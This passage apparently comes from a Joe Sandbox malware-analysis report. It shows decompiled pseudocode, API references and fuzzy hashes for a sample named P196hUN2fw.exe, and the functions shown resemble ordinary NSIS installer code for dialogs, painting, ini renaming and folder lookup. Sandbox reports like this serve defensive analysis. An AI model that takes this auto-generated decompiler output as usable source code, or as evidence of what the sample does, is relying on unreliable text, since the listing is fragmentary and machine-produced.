								SendMessageA( *0x42f408, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f408, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x42983c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x42a048 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00404048(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004043EF();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42ebdc; // 0x4cc0ca
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x42f458;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E0040413A;
					E00404026(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00404026(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00404048( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E0040405B(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x42f414 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x42983c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x42983c = 0;
					return 0;
				}
			}



















              0x0040417f
              0x00404291
              0x004042a4
              0x00404300
              0x00404300
              0x00404304
              0x004043ca
              0x004043d1
              0x004043d3
              0x004043d3
              0x004043d3
              0x004043d9
              0x004043d9
              0x004043dc
              0x00000000
              0x004043e3
              0x00404312
              0x00404314
              0x00404317
              0x0040431e
              0x00404320
              0x00404327
              0x00404329
              0x0040432c
              0x0040432f
              0x00404334
              0x0040433a
              0x0040433d
              0x00404344
              0x00404352
              0x0040436a
              0x0040436c
              0x00404374
              0x00404383
              0x00404385
              0x00404385
              0x00404344
              0x00404327
              0x00404388
              0x0040438f
              0x00000000
              0x00404391
              0x00404391
              0x00404398
              0x00000000
              0x00000000
              0x0040439a
              0x0040439e
              0x004043af
              0x004043af
              0x004043b1
              0x004043b5
              0x004043c3
              0x004043c3
              0x00000000
              0x004043c7
              0x0040438f
              0x004042ac
              0x004042af
              0x00000000
              0x00000000
              0x004042b7
              0x004042bd
              0x00000000
              0x00000000
              0x004042c9
              0x004042cc
              0x004042cf
              0x00000000
              0x00000000
              0x004042f2
              0x004042f2
              0x004042f4
              0x004042f6
              0x004042fb
              0x00000000
              0x00404185
              0x00404185
              0x00404188
              0x0040418d
              0x0040418f
              0x0040419e
              0x0040419e
              0x004041a5
              0x004041a8
              0x004041aa
              0x004041af
              0x004041b8
              0x004041be
              0x004041ca
              0x004041cd
              0x004041d6
              0x004041db
              0x004041de
              0x004041e3
              0x004041fa
              0x00404201
              0x00404214
              0x00404217
              0x0040422c
              0x00404233
              0x00404238
              0x0040423d
              0x0040423d
              0x0040424c
              0x0040425b
              0x0040426d
              0x00404272
              0x00404282
              0x00404284
              0x00000000
              0x0040428a

              APIs
              • CheckDlgButton.USER32 ref: 004041FA
              • GetDlgItem.USER32 ref: 0040420E
              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040422C
              • GetSysColor.USER32(?), ref: 0040423D
              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040424C
              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040425B
              • lstrlenA.KERNEL32(?), ref: 0040425E
              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040426D
              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404282
              • GetDlgItem.USER32 ref: 004042E4
              • SendMessageA.USER32(00000000), ref: 004042E7
              • GetDlgItem.USER32 ref: 00404312
              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404352
              • LoadCursorA.USER32 ref: 00404361
              • SetCursor.USER32(00000000), ref: 0040436A
              • LoadCursorA.USER32 ref: 00404380
              • SetCursor.USER32(00000000), ref: 00404383
              • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043AF
              • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
              • String ID: :A@$N
              • API String ID: 3103080414-504195219
              • Opcode ID: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
              • Instruction ID: 4cc5751811e84191dd39768f0d3a0055f5535ab869bb222e46a2b56927204bf5
              • Opcode Fuzzy Hash: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
              • Instruction Fuzzy Hash: DA6183B1A00205BFEB10AF61DD45F6A7B69EB84715F00413AFB05BA1D1C7B8A951CF98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f414;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f408;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













              0x0040100a
              0x00401039
              0x00401047
              0x0040104d
              0x00401051
              0x0040105b
              0x00401061
              0x00401064
              0x004010f3
              0x00401089
              0x0040108c
              0x004010a6
              0x004010bd
              0x004010cc
              0x004010cf
              0x004010d5
              0x004010d9
              0x004010e4
              0x004010ed
              0x004010ef
              0x004010ef
              0x00401100
              0x00401105
              0x0040110d
              0x00401110
              0x00401112
              0x00401118
              0x0040111f
              0x00401126
              0x00401130
              0x00401142
              0x00401156
              0x00401160
              0x00401165
              0x00401165
              0x00401110
              0x0040116e
              0x00000000
              0x00401178
              0x00401010
              0x00401013
              0x00401015
              0x0040101f
              0x0040101f
              0x00000000

              APIs
              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32 ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectA.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F$Setup Setup
              • API String ID: 941294808-1602013819
              • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
              • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
              • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
              • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405BD4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405BD4(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c600 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca00, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c200, "%s=%s\r\n", 0x42c600, 0x42ca00);
						_t53 = _t52 + 0x10;
						E00405F87(_t37, 0x400, 0x42ca00, 0x42ca00,  *((intOrPtr*)( *0x42f414 + 0x128)));
						_t12 = E00405AFE(0x42ca00, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405B76(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405A63(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405A63(_t38, _t21 + 0xa, 0x40a3b8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405AB9(_t24 + _t46, 0x42c200, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405BA5(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405AFE(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c600, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















              0x00405bd4
              0x00405bdd
              0x00405be4
              0x00405bf8
              0x00405c20
              0x00405c2b
              0x00405c2f
              0x00405c4f
              0x00405c56
              0x00405c60
              0x00405c6d
              0x00405c72
              0x00405c77
              0x00405c7b
              0x00405c8a
              0x00405c8c
              0x00405c99
              0x00405c9d
              0x00405d38
              0x00000000
              0x00405cb3
              0x00405cc0
              0x00405ce4
              0x00405ce8
              0x00405d07
              0x00405d0b
              0x00405d0b
              0x00405d0d
              0x00405d16
              0x00405d21
              0x00405d2c
              0x00405d32
              0x00000000
              0x00405d32
              0x00405cea
              0x00405ced
              0x00405cf8
              0x00405cf4
              0x00405cf6
              0x00405cf7
              0x00405cf7
              0x00405cff
              0x00405d01
              0x00000000
              0x00405d01
              0x00405ccb
              0x00405cd1
              0x00000000
              0x00405cd1
              0x00405c9d
              0x00405c7b
              0x00405bfa
              0x00405c05
              0x00405c0e
              0x00405c12
              0x00000000
              0x00000000
              0x00405c12
              0x00405d43

              APIs
              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
              • GetShortPathNameA.KERNEL32 ref: 00405C0E
                • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
              • GetShortPathNameA.KERNEL32 ref: 00405C2B
              • wsprintfA.USER32 ref: 00405C49
              • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405C84
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
              • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
              • GlobalFree.KERNEL32 ref: 00405D32
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D39
                • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\P196hUN2fw.exe,80000000,00000003), ref: 00405B02
                • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
              • String ID: %s=%s$[Rename]
              • API String ID: 2171350718-1727408572
              • Opcode ID: 19f304a619b6baa61da18707e398eef91e4d1c241cf3942778bb5909504f8d3d
              • Instruction ID: 17f8f1309641d4637e2ed4fc5cbc189083b9795c86085c8cd532ee5919f79a85
              • Opcode Fuzzy Hash: 19f304a619b6baa61da18707e398eef91e4d1c241cf3942778bb5909504f8d3d
              • Instruction Fuzzy Hash: 61310131601B19ABD2206B65AD8DF6B3A5CDF45714F14053BBA01F62D2EA7CA8018EBD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405F87 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199stringCOMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E00405F87(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebdc; // 0x4cc0ca
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f458;
				_t39 = 0x42e3a0;
				_t90 = 0x42e3a0;
				if(_a4 >= 0x42e3a0 && _a4 - 0x42e3a0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E00405F87(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3a0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E00405F65(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00405EC3(_t90,  *0x42f408);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004061CF(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f40c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4a4;
						if( *0x42f4a4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f404;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f408,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f408,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405E4C((_t80 & 0x0000003f) +  *0x42f458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f458, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405F87(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00405F65(_a4, _t39);
			}



























              0x00405f87
              0x00405f87
              0x00405f87
              0x00405f8d
              0x00405f92
              0x00405f94
              0x00405fa3
              0x00405fa3
              0x00405fab
              0x00405fac
              0x00405fad
              0x00405fae
              0x00405fb1
              0x00405fb9
              0x00405fbb
              0x00405fd2
              0x00405fd5
              0x00405fd5
              0x004061ac
              0x004061ac
              0x004061b0
              0x00000000
              0x00000000
              0x00405fe2
              0x00405fe8
              0x00000000
              0x00000000
              0x00405fee
              0x00405fef
              0x00405ff2
              0x00405ff5
              0x0040619f
              0x004061a9
              0x004061ab
              0x004061ab
              0x004061a1
              0x004061a3
              0x004061a5
              0x004061a6
              0x004061a6
              0x00000000
              0x0040619f
              0x00405ffb
              0x00405fff
              0x0040600f
              0x00406016
              0x00406019
              0x00406021
              0x00406024
              0x0040602b
              0x0040602c
              0x0040602f
              0x0040614c
              0x0040614f
              0x0040617f
              0x00406182
              0x00406187
              0x0040618b
              0x0040618b
              0x00406190
              0x00406196
              0x00406198
              0x00000000
              0x00406198
              0x00406151
              0x00406154
              0x00406169
              0x00406170
              0x00406156
              0x0040615d
              0x0040615d
              0x00406178
              0x0040617b
              0x00406144
              0x00406145
              0x00406145
              0x00000000
              0x0040617b
              0x00406035
              0x0040603c
              0x0040603e
              0x0040603f
              0x00406059
              0x00406059
              0x00406060
              0x00406060
              0x00406067
              0x0040606b
              0x0040606b
              0x0040606c
              0x0040606e
              0x004060a7
              0x004060aa
              0x004060ba
              0x004060bd
              0x004060c5
              0x004060cb
              0x004060cb
              0x0040612a
              0x0040612a
              0x0040612c
              0x00000000
              0x00000000
              0x004060cf
              0x004060d6
              0x004060d7
              0x004060d9
              0x004060f3
              0x00406101
              0x00406107
              0x00406109
              0x00406127
              0x00406127
              0x00406127
              0x00000000
              0x00406127
              0x0040610f
              0x00406118
              0x0040611b
              0x00406121
              0x00406125
              0x00000000
              0x00000000
              0x00000000
              0x00406125
              0x004060db
              0x004060de
              0x00000000
              0x00000000
              0x004060ed
              0x004060ef
              0x004060f1
              0x00000000
              0x00000000
              0x00000000
              0x004060f1
              0x00000000
              0x0040612a
              0x004060b2
              0x00000000
              0x00406070
              0x0040608b
              0x00406090
              0x00406093
              0x00406133
              0x00406133
              0x00406137
              0x0040613f
              0x0040613f
              0x00000000
              0x00406137
              0x0040609d
              0x0040612e
              0x0040612e
              0x00406131
              0x00000000
              0x00000000
              0x00000000
              0x00406131
              0x0040606e
              0x00406041
              0x00406045
              0x00000000
              0x00000000
              0x00406047
              0x0040604b
              0x00000000
              0x00000000
              0x0040604d
              0x00406051
              0x00000000
              0x00406053
              0x00406053
              0x00000000
              0x00406053
              0x00406051
              0x004061b6
              0x004061c0
              0x004061cc
              0x004061cc
              0x00000000

              APIs
              • GetSystemDirectoryA.KERNEL32 ref: 004060B2
              • GetWindowsDirectoryA.KERNEL32(0042E3A0,00000400,?,0042A050,00000000,004050C4,0042A050,00000000), ref: 004060C5
              • SHGetSpecialFolderLocation.SHELL32(004050C4,766DEA30,?,0042A050,00000000,004050C4,0042A050,00000000), ref: 00406101
              • SHGetPathFromIDListA.SHELL32(766DEA30,0042E3A0), ref: 0040610F
              • CoTaskMemFree.OLE32(766DEA30), ref: 0040611B
              • lstrcatA.KERNEL32(0042E3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040613F
              • lstrlenA.KERNEL32(0042E3A0,?,0042A050,00000000,004050C4,0042A050,00000000,00000000,00419517,766DEA30), ref: 00406191
              Strings
              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406139
              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406081
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 717251189-730719616
              • Opcode ID: 93175b9e86ceeaf5bc26d2662ee9bcff77ced71dd0aab543063507f0a11e8a4f
              • Instruction ID: 1b13e8ff18f2312f61c88a614d7ce51b6c0fc9f7833a06fa9902b6248b39176d
              • Opcode Fuzzy Hash: 93175b9e86ceeaf5bc26d2662ee9bcff77ced71dd0aab543063507f0a11e8a4f
              • Instruction Fuzzy Hash: D561F170A00105AEDF20AF24CC90BBB3BA5EB55314F56413FE903BA2D2C67D4962CB5E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004061CF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004061CF(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
